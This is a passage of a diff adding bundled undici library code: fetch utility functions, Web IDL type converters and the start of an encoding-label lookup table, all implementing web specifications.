+ const algorithm = parsedToken.groups.algo + + // 5. If algorithm is a hash function recognized by the user + // agent, add the parsed token to result. + if (supportedHashes.includes(algorithm.toLowerCase())) { + result.push(parsedToken.groups) + } + } + + // 4. Return no metadata if empty is true, otherwise return result. + if (empty === true) { + return 'no metadata' + } + + return result +} + +// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request +function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { + // TODO +} + +/** + * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} + * @param {URL} A + * @param {URL} B + */ +function sameOrigin (A, B) { + // 1. If A and B are the same opaque origin, then return true. + if (A.origin === B.origin && A.origin === 'null') { + return true + } + + // 2. If A and B are both tuple origins and their schemes, + // hosts, and port are identical, then return true. + if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { + return true + } + + // 3. Return false. + return false +} + +function createDeferredPromise () { + let res + let rej + const promise = new Promise((resolve, reject) => { + res = resolve + rej = reject + }) + + return { promise, resolve: res, reject: rej } +} + +function isAborted (fetchParams) { + return fetchParams.controller.state === 'aborted' +} + +function isCancelled (fetchParams) { + return fetchParams.controller.state === 'aborted' || + fetchParams.controller.state === 'terminated' +} + +const normalizeMethodRecord = { + delete: 'DELETE', + DELETE: 'DELETE', + get: 'GET', + GET: 'GET', + head: 'HEAD', + HEAD: 'HEAD', + options: 'OPTIONS', + OPTIONS: 'OPTIONS', + post: 'POST', + POST: 'POST', + put: 'PUT', + PUT: 'PUT' +} + +// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. 
+Object.setPrototypeOf(normalizeMethodRecord, null) + +/** + * @see https://fetch.spec.whatwg.org/#concept-method-normalize + * @param {string} method + */ +function normalizeMethod (method) { + return normalizeMethodRecord[method.toLowerCase()] ?? method +} + +// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string +function serializeJavascriptValueToJSONString (value) { + // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). + const result = JSON.stringify(value) + + // 2. If result is undefined, then throw a TypeError. + if (result === undefined) { + throw new TypeError('Value is not JSON serializable') + } + + // 3. Assert: result is a string. + assert(typeof result === 'string') + + // 4. Return result. + return result +} + +// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object +const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) + +/** + * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object + * @param {() => unknown[]} iterator + * @param {string} name name of the instance + * @param {'key'|'value'|'key+value'} kind + */ +function makeIterator (iterator, name, kind) { + const object = { + index: 0, + kind, + target: iterator + } + + const i = { + next () { + // 1. Let interface be the interface for which the iterator prototype object exists. + + // 2. Let thisValue be the this value. + + // 3. Let object be ? ToObject(thisValue). + + // 4. If object is a platform object, then perform a security + // check, passing: + + // 5. If object is not a default iterator object for interface, + // then throw a TypeError. + if (Object.getPrototypeOf(this) !== i) { + throw new TypeError( + `'next' called on an object that does not implement interface ${name} Iterator.` + ) + } + + // 6. Let index be object’s index. + // 7. Let kind be object’s kind. + // 8. Let values be object’s target's value pairs to iterate over. 
+ const { index, kind, target } = object + const values = target() + + // 9. Let len be the length of values. + const len = values.length + + // 10. If index is greater than or equal to len, then return + // CreateIterResultObject(undefined, true). + if (index >= len) { + return { value: undefined, done: true } + } + + // 11. Let pair be the entry in values at index index. + const pair = values[index] + + // 12. Set object’s index to index + 1. + object.index = index + 1 + + // 13. Return the iterator result for pair and kind. + return iteratorResult(pair, kind) + }, + // The class string of an iterator prototype object for a given interface is the + // result of concatenating the identifier of the interface and the string " Iterator". + [Symbol.toStringTag]: `${name} Iterator` + } + + // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. + Object.setPrototypeOf(i, esIteratorPrototype) + // esIteratorPrototype needs to be the prototype of i + // which is the prototype of an empty object. Yes, it's confusing. + return Object.setPrototypeOf({}, i) +} + +// https://webidl.spec.whatwg.org/#iterator-result +function iteratorResult (pair, kind) { + let result + + // 1. Let result be a value determined by the value of kind: + switch (kind) { + case 'key': { + // 1. Let idlKey be pair’s key. + // 2. Let key be the result of converting idlKey to an + // ECMAScript value. + // 3. result is key. + result = pair[0] + break + } + case 'value': { + // 1. Let idlValue be pair’s value. + // 2. Let value be the result of converting idlValue to + // an ECMAScript value. + // 3. result is value. + result = pair[1] + break + } + case 'key+value': { + // 1. Let idlKey be pair’s key. + // 2. Let idlValue be pair’s value. + // 3. Let key be the result of converting idlKey to an + // ECMAScript value. + // 4. Let value be the result of converting idlValue to + // an ECMAScript value. + // 5. Let array be ! ArrayCreate(2). + // 6. Call ! 
CreateDataProperty(array, "0", key). + // 7. Call ! CreateDataProperty(array, "1", value). + // 8. result is array. + result = pair + break + } + } + + // 2. Return CreateIterResultObject(result, false). + return { value: result, done: false } +} + +/** + * @see https://fetch.spec.whatwg.org/#body-fully-read + */ +async function fullyReadBody (body, processBody, processBodyError) { + // 1. If taskDestination is null, then set taskDestination to + // the result of starting a new parallel queue. + + // 2. Let successSteps given a byte sequence bytes be to queue a + // fetch task to run processBody given bytes, with taskDestination. + const successSteps = processBody + + // 3. Let errorSteps be to queue a fetch task to run processBodyError, + // with taskDestination. + const errorSteps = processBodyError + + // 4. Let reader be the result of getting a reader for body’s stream. + // If that threw an exception, then run errorSteps with that + // exception and return. + let reader + + try { + reader = body.stream.getReader() + } catch (e) { + errorSteps(e) + return + } + + // 5. Read all bytes from reader, given successSteps and errorSteps. + try { + const result = await readAllBytes(reader) + successSteps(result) + } catch (e) { + errorSteps(e) + } +} + +/** @type {ReadableStream} */ +let ReadableStream = globalThis.ReadableStream + +function isReadableStreamLike (stream) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + return stream instanceof ReadableStream || ( + stream[Symbol.toStringTag] === 'ReadableStream' && + typeof stream.tee === 'function' + ) +} + +const MAXIMUM_ARGUMENT_LENGTH = 65535 + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-decode + * @param {number[]|Uint8Array} input + */ +function isomorphicDecode (input) { + // 1. 
To isomorphic decode a byte sequence input, return a string whose code point + // length is equal to input’s length and whose code points have the same values + // as the values of input’s bytes, in the same order. + + if (input.length < MAXIMUM_ARGUMENT_LENGTH) { + return String.fromCharCode(...input) + } + + return input.reduce((previous, current) => previous + String.fromCharCode(current), '') +} + +/** + * @param {ReadableStreamController} controller + */ +function readableStreamClose (controller) { + try { + controller.close() + } catch (err) { + // TODO: add comment explaining why this error occurs. + if (!err.message.includes('Controller is already closed')) { + throw err + } + } +} + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-encode + * @param {string} input + */ +function isomorphicEncode (input) { + // 1. Assert: input contains no code points greater than U+00FF. + for (let i = 0; i < input.length; i++) { + assert(input.charCodeAt(i) <= 0xFF) + } + + // 2. Return a byte sequence whose length is equal to input’s code + // point length and whose bytes have the same values as the + // values of input’s code points, in the same order + return input +} + +/** + * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes + * @see https://streams.spec.whatwg.org/#read-loop + * @param {ReadableStreamDefaultReader} reader + */ +async function readAllBytes (reader) { + const bytes = [] + let byteLength = 0 + + while (true) { + const { done, value: chunk } = await reader.read() + + if (done) { + // 1. Call successSteps with bytes. + return Buffer.concat(bytes, byteLength) + } + + // 1. If chunk is not a Uint8Array object, call failureSteps + // with a TypeError and abort these steps. + if (!isUint8Array(chunk)) { + throw new TypeError('Received non-Uint8Array chunk') + } + + // 2. Append the bytes represented by chunk to bytes. + bytes.push(chunk) + byteLength += chunk.length + + // 3. 
Read-loop given reader, bytes, successSteps, and failureSteps. + } +} + +/** + * @see https://fetch.spec.whatwg.org/#is-local + * @param {URL} url + */ +function urlIsLocal (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' +} + +/** + * @param {string|URL} url + */ +function urlHasHttpsScheme (url) { + if (typeof url === 'string') { + return url.startsWith('https:') + } + + return url.protocol === 'https:' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-scheme + * @param {URL} url + */ +function urlIsHttpHttpsScheme (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'http:' || protocol === 'https:' +} + +/** + * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. + */ +const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) + +module.exports = { + isAborted, + isCancelled, + createDeferredPromise, + ReadableStreamFrom, + toUSVString, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + coarsenedSharedCurrentTime, + determineRequestsReferrer, + makePolicyContainer, + clonePolicyContainer, + appendFetchMetadata, + appendRequestOriginHeader, + TAOCheck, + corsCheck, + crossOriginResourcePolicyCheck, + createOpaqueTimingInfo, + setRequestReferrerPolicyOnRedirect, + isValidHTTPToken, + requestBadPort, + requestCurrentURL, + responseURL, + responseLocationURL, + isBlobLike, + isURLPotentiallyTrustworthy, + isValidReasonPhrase, + sameOrigin, + normalizeMethod, + serializeJavascriptValueToJSONString, + makeIterator, + isValidHeaderName, + isValidHeaderValue, + hasOwn, + isErrorLike, + fullyReadBody, + bytesMatch, + isReadableStreamLike, + readableStreamClose, + isomorphicEncode, + isomorphicDecode, + urlIsLocal, + urlHasHttpsScheme, + urlIsHttpHttpsScheme, + readAllBytes, + normalizeMethodRecord +} + + +/***/ }), 
+ +/***/ 1744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { types } = __nccwpck_require__(3837) +const { hasOwn, toUSVString } = __nccwpck_require__(2538) + +/** @type {import('../../types/webidl').Webidl} */ +const webidl = {} +webidl.converters = {} +webidl.util = {} +webidl.errors = {} + +webidl.errors.exception = function (message) { + return new TypeError(`${message.header}: ${message.message}`) +} + +webidl.errors.conversionFailed = function (context) { + const plural = context.types.length === 1 ? '' : ' one of' + const message = + `${context.argument} could not be converted to` + + `${plural}: ${context.types.join(', ')}.` + + return webidl.errors.exception({ + header: context.prefix, + message + }) +} + +webidl.errors.invalidArgument = function (context) { + return webidl.errors.exception({ + header: context.prefix, + message: `"${context.value}" is an invalid ${context.type}.` + }) +} + +// https://webidl.spec.whatwg.org/#implements +webidl.brandCheck = function (V, I, opts = undefined) { + if (opts?.strict !== false && !(V instanceof I)) { + throw new TypeError('Illegal invocation') + } else { + return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] + } +} + +webidl.argumentLengthCheck = function ({ length }, min, ctx) { + if (length < min) { + throw webidl.errors.exception({ + message: `${min} argument${min !== 1 ? 's' : ''} required, ` + + `but${length ? 
' only' : ''} ${length} found.`, + ...ctx + }) + } +} + +webidl.illegalConstructor = function () { + throw webidl.errors.exception({ + header: 'TypeError', + message: 'Illegal constructor' + }) +} + +// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values +webidl.util.Type = function (V) { + switch (typeof V) { + case 'undefined': return 'Undefined' + case 'boolean': return 'Boolean' + case 'string': return 'String' + case 'symbol': return 'Symbol' + case 'number': return 'Number' + case 'bigint': return 'BigInt' + case 'function': + case 'object': { + if (V === null) { + return 'Null' + } + + return 'Object' + } + } +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint +webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { + let upperBound + let lowerBound + + // 1. If bitLength is 64, then: + if (bitLength === 64) { + // 1. Let upperBound be 2^53 − 1. + upperBound = Math.pow(2, 53) - 1 + + // 2. If signedness is "unsigned", then let lowerBound be 0. + if (signedness === 'unsigned') { + lowerBound = 0 + } else { + // 3. Otherwise let lowerBound be −2^53 + 1. + lowerBound = Math.pow(-2, 53) + 1 + } + } else if (signedness === 'unsigned') { + // 2. Otherwise, if signedness is "unsigned", then: + + // 1. Let lowerBound be 0. + lowerBound = 0 + + // 2. Let upperBound be 2^bitLength − 1. + upperBound = Math.pow(2, bitLength) - 1 + } else { + // 3. Otherwise: + + // 1. Let lowerBound be -2^bitLength − 1. + lowerBound = Math.pow(-2, bitLength) - 1 + + // 2. Let upperBound be 2^bitLength − 1 − 1. + upperBound = Math.pow(2, bitLength - 1) - 1 + } + + // 4. Let x be ? ToNumber(V). + let x = Number(V) + + // 5. If x is −0, then set x to +0. + if (x === 0) { + x = 0 + } + + // 6. If the conversion is to an IDL type associated + // with the [EnforceRange] extended attribute, then: + if (opts.enforceRange === true) { + // 1. If x is NaN, +∞, or −∞, then throw a TypeError. 
+ if ( + Number.isNaN(x) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Could not convert ${V} to an integer.` + }) + } + + // 2. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 3. If x < lowerBound or x > upperBound, then + // throw a TypeError. + if (x < lowerBound || x > upperBound) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` + }) + } + + // 4. Return x. + return x + } + + // 7. If x is not NaN and the conversion is to an IDL + // type associated with the [Clamp] extended + // attribute, then: + if (!Number.isNaN(x) && opts.clamp === true) { + // 1. Set x to min(max(x, lowerBound), upperBound). + x = Math.min(Math.max(x, lowerBound), upperBound) + + // 2. Round x to the nearest integer, choosing the + // even integer if it lies halfway between two, + // and choosing +0 rather than −0. + if (Math.floor(x) % 2 === 0) { + x = Math.floor(x) + } else { + x = Math.ceil(x) + } + + // 3. Return x. + return x + } + + // 8. If x is NaN, +0, +∞, or −∞, then return +0. + if ( + Number.isNaN(x) || + (x === 0 && Object.is(0, x)) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + return 0 + } + + // 9. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 10. Set x to x modulo 2^bitLength. + x = x % Math.pow(2, bitLength) + + // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, + // then return x − 2^bitLength. + if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { + return x - Math.pow(2, bitLength) + } + + // 12. Otherwise, return x. + return x +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart +webidl.util.IntegerPart = function (n) { + // 1. Let r be floor(abs(n)). + const r = Math.floor(Math.abs(n)) + + // 2. If n < 0, then return -1 × r. 
+ if (n < 0) { + return -1 * r + } + + // 3. Otherwise, return r. + return r +} + +// https://webidl.spec.whatwg.org/#es-sequence +webidl.sequenceConverter = function (converter) { + return (V) => { + // 1. If Type(V) is not Object, throw a TypeError. + if (webidl.util.Type(V) !== 'Object') { + throw webidl.errors.exception({ + header: 'Sequence', + message: `Value of type ${webidl.util.Type(V)} is not an Object.` + }) + } + + // 2. Let method be ? GetMethod(V, @@iterator). + /** @type {Generator} */ + const method = V?.[Symbol.iterator]?.() + const seq = [] + + // 3. If method is undefined, throw a TypeError. + if ( + method === undefined || + typeof method.next !== 'function' + ) { + throw webidl.errors.exception({ + header: 'Sequence', + message: 'Object is not an iterator.' + }) + } + + // https://webidl.spec.whatwg.org/#create-sequence-from-iterable + while (true) { + const { done, value } = method.next() + + if (done) { + break + } + + seq.push(converter(value)) + } + + return seq + } +} + +// https://webidl.spec.whatwg.org/#es-to-record +webidl.recordConverter = function (keyConverter, valueConverter) { + return (O) => { + // 1. If Type(O) is not Object, throw a TypeError. + if (webidl.util.Type(O) !== 'Object') { + throw webidl.errors.exception({ + header: 'Record', + message: `Value of type ${webidl.util.Type(O)} is not an Object.` + }) + } + + // 2. Let result be a new empty instance of record. + const result = {} + + if (!types.isProxy(O)) { + // Object.keys only returns enumerable properties + const keys = Object.keys(O) + + for (const key of keys) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + + // 5. Return result. + return result + } + + // 3. Let keys be ? 
O.[[OwnPropertyKeys]](). + const keys = Reflect.ownKeys(O) + + // 4. For each key of keys. + for (const key of keys) { + // 1. Let desc be ? O.[[GetOwnProperty]](key). + const desc = Reflect.getOwnPropertyDescriptor(O, key) + + // 2. If desc is not undefined and desc.[[Enumerable]] is true: + if (desc?.enumerable) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + } + + // 5. Return result. + return result + } +} + +webidl.interfaceConverter = function (i) { + return (V, opts = {}) => { + if (opts.strict !== false && !(V instanceof i)) { + throw webidl.errors.exception({ + header: i.name, + message: `Expected ${V} to be an instance of ${i.name}.` + }) + } + + return V + } +} + +webidl.dictionaryConverter = function (converters) { + return (dictionary) => { + const type = webidl.util.Type(dictionary) + const dict = {} + + if (type === 'Null' || type === 'Undefined') { + return dict + } else if (type !== 'Object') { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` + }) + } + + for (const options of converters) { + const { key, defaultValue, required, converter } = options + + if (required === true) { + if (!hasOwn(dictionary, key)) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Missing required key "${key}".` + }) + } + } + + let value = dictionary[key] + const hasDefault = hasOwn(options, 'defaultValue') + + // Only use defaultValue if value is undefined and + // a defaultValue options was provided. + if (hasDefault && value !== null) { + value = value ?? defaultValue + } + + // A key can be optional and have no default value. 
+ // When this happens, do not perform a conversion, + // and do not assign the key a value. + if (required || hasDefault || value !== undefined) { + value = converter(value) + + if ( + options.allowedValues && + !options.allowedValues.includes(value) + ) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` + }) + } + + dict[key] = value + } + } + + return dict + } +} + +webidl.nullableConverter = function (converter) { + return (V) => { + if (V === null) { + return V + } + + return converter(V) + } +} + +// https://webidl.spec.whatwg.org/#es-DOMString +webidl.converters.DOMString = function (V, opts = {}) { + // 1. If V is null and the conversion is to an IDL type + // associated with the [LegacyNullToEmptyString] + // extended attribute, then return the DOMString value + // that represents the empty string. + if (V === null && opts.legacyNullToEmptyString) { + return '' + } + + // 2. Let x be ? ToString(V). + if (typeof V === 'symbol') { + throw new TypeError('Could not convert argument of type symbol to string.') + } + + // 3. Return the IDL DOMString value that represents the + // same sequence of code units as the one the + // ECMAScript String value x represents. + return String(V) +} + +// https://webidl.spec.whatwg.org/#es-ByteString +webidl.converters.ByteString = function (V) { + // 1. Let x be ? ToString(V). + // Note: DOMString converter perform ? ToString(V) + const x = webidl.converters.DOMString(V) + + // 2. If the value of any element of x is greater than + // 255, then throw a TypeError. + for (let index = 0; index < x.length; index++) { + if (x.charCodeAt(index) > 255) { + throw new TypeError( + 'Cannot convert argument to a ByteString because the character at ' + + `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` + ) + } + } + + // 3. 
Return an IDL ByteString value whose length is the + // length of x, and where the value of each element is + // the value of the corresponding element of x. + return x +} + +// https://webidl.spec.whatwg.org/#es-USVString +webidl.converters.USVString = toUSVString + +// https://webidl.spec.whatwg.org/#es-boolean +webidl.converters.boolean = function (V) { + // 1. Let x be the result of computing ToBoolean(V). + const x = Boolean(V) + + // 2. Return the IDL boolean value that is the one that represents + // the same truth value as the ECMAScript Boolean value x. + return x +} + +// https://webidl.spec.whatwg.org/#es-any +webidl.converters.any = function (V) { + return V +} + +// https://webidl.spec.whatwg.org/#es-long-long +webidl.converters['long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "signed"). + const x = webidl.util.ConvertToInt(V, 64, 'signed') + + // 2. Return the IDL long long value that represents + // the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long-long +webidl.converters['unsigned long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). + const x = webidl.util.ConvertToInt(V, 64, 'unsigned') + + // 2. Return the IDL unsigned long long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long +webidl.converters['unsigned long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). + const x = webidl.util.ConvertToInt(V, 32, 'unsigned') + + // 2. Return the IDL unsigned long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-short +webidl.converters['unsigned short'] = function (V, opts) { + // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). + const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) + + // 2. Return the IDL unsigned short value that represents + // the same numeric value as x. 
+ return x +} + +// https://webidl.spec.whatwg.org/#idl-ArrayBuffer +webidl.converters.ArrayBuffer = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have an + // [[ArrayBufferData]] internal slot, then throw a + // TypeError. + // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances + // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances + if ( + webidl.util.Type(V) !== 'Object' || + !types.isAnyArrayBuffer(V) + ) { + throw webidl.errors.conversionFailed({ + prefix: `${V}`, + argument: `${V}`, + types: ['ArrayBuffer'] + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V) is true, then throw a + // TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V) is true, then throw a + // TypeError. + // Note: resizable ArrayBuffers are currently a proposal. + + // 4. Return the IDL ArrayBuffer value that is a + // reference to the same object as V. + return V +} + +webidl.converters.TypedArray = function (V, T, opts = {}) { + // 1. Let T be the IDL type V is being converted to. + + // 2. If Type(V) is not Object, or V does not have a + // [[TypedArrayName]] internal slot with a value + // equal to T’s name, then throw a TypeError. + if ( + webidl.util.Type(V) !== 'Object' || + !types.isTypedArray(V) || + V.constructor.name !== T.name + ) { + throw webidl.errors.conversionFailed({ + prefix: `${T.name}`, + argument: `${V}`, + types: [T.name] + }) + } + + // 3. 
If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 4. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable array buffers are currently a proposal + + // 5. Return the IDL value of type T that is a reference + // to the same object as V. + return V +} + +webidl.converters.DataView = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have a + // [[DataView]] internal slot, then throw a TypeError. + if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { + throw webidl.errors.exception({ + header: 'DataView', + message: 'Object is not a DataView.' + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, + // then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable ArrayBuffers are currently a proposal + + // 4. Return the IDL DataView value that is a reference + // to the same object as V. 
+ return V +} + +// https://webidl.spec.whatwg.org/#BufferSource +webidl.converters.BufferSource = function (V, opts = {}) { + if (types.isAnyArrayBuffer(V)) { + return webidl.converters.ArrayBuffer(V, opts) + } + + if (types.isTypedArray(V)) { + return webidl.converters.TypedArray(V, V.constructor) + } + + if (types.isDataView(V)) { + return webidl.converters.DataView(V, opts) + } + + throw new TypeError(`Could not convert ${V} to a BufferSource.`) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.ByteString +) + +webidl.converters['sequence>'] = webidl.sequenceConverter( + webidl.converters['sequence'] +) + +webidl.converters['record'] = webidl.recordConverter( + webidl.converters.ByteString, + webidl.converters.ByteString +) + +module.exports = { + webidl +} + + +/***/ }), + +/***/ 4854: +/***/ ((module) => { + +"use strict"; + + +/** + * @see https://encoding.spec.whatwg.org/#concept-encoding-get + * @param {string|undefined} label + */ +function getEncoding (label) { + if (!label) { + return 'failure' + } + + // 1. Remove any leading and trailing ASCII whitespace from label. + // 2. If label is an ASCII case-insensitive match for any of the + // labels listed in the table below, then return the + // corresponding encoding; otherwise return failure. 
+ switch (label.trim().toLowerCase()) { + case 'unicode-1-1-utf-8': + case 'unicode11utf8': + case 'unicode20utf8': + case 'utf-8': + case 'utf8': + case 'x-unicode20utf8': + return 'UTF-8' + case '866': + case 'cp866': + case 'csibm866': + case 'ibm866': + return 'IBM866' + case 'csisolatin2': + case 'iso-8859-2': + case 'iso-ir-101': + case 'iso8859-2': + case 'iso88592': + case 'iso_8859-2': + case 'iso_8859-2:1987': + case 'l2': + case 'latin2': + return 'ISO-8859-2' + case 'csisolatin3': + case 'iso-8859-3': + case 'iso-ir-109': + case 'iso8859-3': + case 'iso88593': + case 'iso_8859-3': + case 'iso_8859-3:1988': + case 'l3': + case 'latin3': + return 'ISO-8859-3' + case 'csisolatin4': + case 'iso-8859-4': + case 'iso-ir-110': + case 'iso8859-4': + case 'iso88594': + case 'iso_8859-4': + case 'iso_8859-4:1988': + case 'l4': + case 'latin4': + return 'ISO-8859-4' + case 'csisolatincyrillic': + case 'cyrillic': + case 'iso-8859-5': + case 'iso-ir-144': + case 'iso8859-5': + case 'iso88595': + case 'iso_8859-5': + case 'iso_8859-5:1988': + return 'ISO-8859-5' + case 'arabic': + case 'asmo-708': + case 'csiso88596e': + case 'csiso88596i': + case 'csisolatinarabic': + case 'ecma-114': + case 'iso-8859-6': + case 'iso-8859-6-e': + case 'iso-8859-6-i': + case 'iso-ir-127': + case 'iso8859-6': + case 'iso88596': + case 'iso_8859-6': + case 'iso_8859-6:1987': + return 'ISO-8859-6' + case 'csisolatingreek': + case 'ecma-118': + case 'elot_928': + case 'greek': + case 'greek8': + case 'iso-8859-7': + case 'iso-ir-126': + case 'iso8859-7': + case 'iso88597': + case 'iso_8859-7': + case 'iso_8859-7:1987': + case 'sun_eu_greek': + return 'ISO-8859-7' + case 'csiso88598e': + case 'csisolatinhebrew': + case 'hebrew': + case 'iso-8859-8': + case 'iso-8859-8-e': + case 'iso-ir-138': + case 'iso8859-8': + case 'iso88598': + case 'iso_8859-8': + case 'iso_8859-8:1988': + case 'visual': + return 'ISO-8859-8' + case 'csiso88598i': + case 'iso-8859-8-i': + case 'logical': + return 
'ISO-8859-8-I' + case 'csisolatin6': + case 'iso-8859-10': + case 'iso-ir-157': + case 'iso8859-10': + case 'iso885910': + case 'l6': + case 'latin6': + return 'ISO-8859-10' + case 'iso-8859-13': + case 'iso8859-13': + case 'iso885913': + return 'ISO-8859-13' + case 'iso-8859-14': + case 'iso8859-14': + case 'iso885914': + return 'ISO-8859-14' + case 'csisolatin9': + case 'iso-8859-15': + case 'iso8859-15': + case 'iso885915': + case 'iso_8859-15': + case 'l9': + return 'ISO-8859-15' + case 'iso-8859-16': + return 'ISO-8859-16' + case 'cskoi8r': + case 'koi': + case 'koi8': + case 'koi8-r': + case 'koi8_r': + return 'KOI8-R' + case 'koi8-ru': + case 'koi8-u': + return 'KOI8-U' + case 'csmacintosh': + case 'mac': + case 'macintosh': + case 'x-mac-roman': + return 'macintosh' + case 'iso-8859-11': + case 'iso8859-11': + case 'iso885911': + case 'tis-620': + case 'windows-874': + return 'windows-874' + case 'cp1250': + case 'windows-1250': + case 'x-cp1250': + return 'windows-1250' + case 'cp1251': + case 'windows-1251': + case 'x-cp1251': + return 'windows-1251' + case 'ansi_x3.4-1968': + case 'ascii': + case 'cp1252': + case 'cp819': + case 'csisolatin1': + case 'ibm819': + case 'iso-8859-1': + case 'iso-ir-100': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'iso_8859-1:1987': + case 'l1': + case 'latin1': + case 'us-ascii': + case 'windows-1252': + case 'x-cp1252': + return 'windows-1252' + case 'cp1253': + case 'windows-1253': + case 'x-cp1253': + return 'windows-1253' + case 'cp1254': + case 'csisolatin5': + case 'iso-8859-9': + case 'iso-ir-148': + case 'iso8859-9': + case 'iso88599': + case 'iso_8859-9': + case 'iso_8859-9:1989': + case 'l5': + case 'latin5': + case 'windows-1254': + case 'x-cp1254': + return 'windows-1254' + case 'cp1255': + case 'windows-1255': + case 'x-cp1255': + return 'windows-1255' + case 'cp1256': + case 'windows-1256': + case 'x-cp1256': + return 'windows-1256' + case 'cp1257': + case 'windows-1257': + case 
